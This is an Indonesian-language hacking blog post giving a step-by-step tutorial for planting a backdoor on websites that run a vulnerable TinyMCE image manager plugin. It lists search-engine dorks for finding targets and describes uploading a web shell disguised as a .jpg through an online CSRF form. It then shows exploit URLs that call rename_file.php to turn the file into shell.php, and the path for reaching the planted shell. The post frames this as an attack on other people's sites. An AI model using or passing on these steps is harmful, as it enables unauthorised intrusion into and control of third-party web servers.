vulnerability TinyMce plugins image Manager

Kurou
vulnerability TinyMce plugins image Manager
Kurou

vulnerability TinyMce plugins image Manager

assalamualaikum mang , ketemu lagi dengan saya kali ini saya akan berbagi tutorial inject TinyMce plugins , meng upload file termasuk backdoor kedalam web target .

jika upload backdoor kita siapin terlebih dahulu backdoor yang telah di rename ke ekstensi .jpg 

contoh shell.jpg 

 ( lebih baik menggunakan uploader / mini shell , baru nanti kalo sudah tertanam , tanam ulang menggunakan shell besar )

dork :

inurl:/tinymce/plugins/image/
inurl:/tinymce/plugins/image/upload.php
inurl:/tinymce/plugins/image/uploads/

 kembangin ~
exploit :

site.com/[path]/tinymce/plugins/image/upload.php
 jika muncul tulisan seperti itu kita lanjutkan ke tahap selanjutnya , jika not found cari web lain saja hehehe ,
setelah itu langsung kita pakai CSRF

CSRF ONLINE DISINI


URL isi site target nya
POST file :  upl

 kunci target



pilih file backdoor kita ( berbentuk jpg )

klik upload file
file sukses ke upload dengan nama FILE-20180606-1330UMKFHD3A48ZA.jpg

 kita rename file tersebut menjadi file yang ber ekstensi .php supaya menjadi backdoor lagi dengan cara sebagai berikut

/rename_file.php?current_name=file-backdoor.jpg&new_name=shell.php

contoh :

http://********.com/[path]/tinymce/plugins/image/rename_file.php?current_name=FILE-20180606-1330UMKFHD3A48ZA.jpg&new_name=shell.php

lihat URL pada gambar diatas supaya gak bingung :'v
kalo muncul text succes dan banyak seperti itu maka file kita berhasil kita rename menjadi shell.php

cara akses file yang telah di upload :


http://site.com/[path]/tinymce/plugins/image/uploads/shell.php



sekian semoga bermanfaat :v
wassalamualaikum wr.wb

thanks to ./SpecimenT Hacker Patah Hati
terinspirsi dari https://www.panel-pekok.ga/2018/06/tinymce-image-manager.html
Share This :
Kurou

comment 0 komentar

more_vert
Subscribe to: Post Comments (Atom)